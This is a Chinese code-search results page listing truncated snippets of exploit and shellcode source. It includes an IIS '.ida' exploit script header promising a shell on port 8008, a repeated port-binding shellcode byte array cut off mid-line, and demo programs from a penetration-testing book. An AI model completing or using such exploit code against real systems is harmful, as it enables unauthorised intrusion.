代码搜索:Shellcode
找到约 263 项符合「Shellcode」的源代码
代码结果 263
www.eeworm.com/read/101671/15822390
sh ida-exploit.sh
#!/bin/sh
# .ida nasty exploit
# mat@hacksware.com,mat@monkey.org
# http://monkey.org/~mat
#
# If this exploit succeeds, you can get into the machine through port 8008
# shellcode generated by DeepZon
www.eeworm.com/read/12198/240169
c 50.c
#include
#include
#include
//Portbinding Shellcode
char shellcode[] =
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\
www.eeworm.com/read/311187/3687445
c 50.c
#include
#include
#include
//Portbinding Shellcode
char shellcode[] =
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\
www.eeworm.com/read/311187/3687565
c 50.c
#include
#include
#include
//Portbinding Shellcode
char shellcode[] =
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\
www.eeworm.com/read/159132/10692228
c client_getpeername.c
/* client_getpeername.c
*
* 《网络渗透技术》演示程序
* 作者:san, alert7, eyas, watercloud
*
* getpeername查找socket的shellcode演示
*/
#include
#include
#include
#pragma co
www.eeworm.com/read/159132/10692332
c client_ioctl_fionread.c
/* client_ioctl_FIONREAD.c
*
* 《网络渗透技术》演示程序
* 作者:san, alert7, eyas, watercloud
*
* use ioctl to find socket shellcode for Linux x86
*/
#include
#include
#include
www.eeworm.com/read/332113/3401452
c client_getpeername.c
/* client_getpeername.c
*
* 《网络渗透技术》演示程序
* 作者:san, alert7, eyas, watercloud
*
* getpeername查找socket的shellcode演示
*/
#include
#include
#include
#pragma co
www.eeworm.com/read/332113/3401479
c client_ioctl_fionread.c
/* client_ioctl_FIONREAD.c
*
* 《网络渗透技术》演示程序
* 作者:san, alert7, eyas, watercloud
*
* use ioctl to find socket shellcode for Linux x86
*/
#include
#include
#include
www.eeworm.com/read/159132/10692328
c client_fcntl.c
/* client_fcntl.c
*
* 《网络渗透技术》演示程序
* 作者:san, alert7, eyas, watercloud
*
* Use fcntl to find socket shellcode for Linux x86
*
*/
#include
#include
#include
www.eeworm.com/read/332113/3401478
c client_fcntl.c
/* client_fcntl.c
*
* 《网络渗透技术》演示程序
* 作者:san, alert7, eyas, watercloud
*
* Use fcntl to find socket shellcode for Linux x86
*
*/
#include
#include
#include